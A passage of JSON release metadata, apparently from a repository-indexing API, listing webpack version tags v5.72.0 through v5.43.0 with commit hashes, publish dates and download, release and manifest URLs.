m/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fweb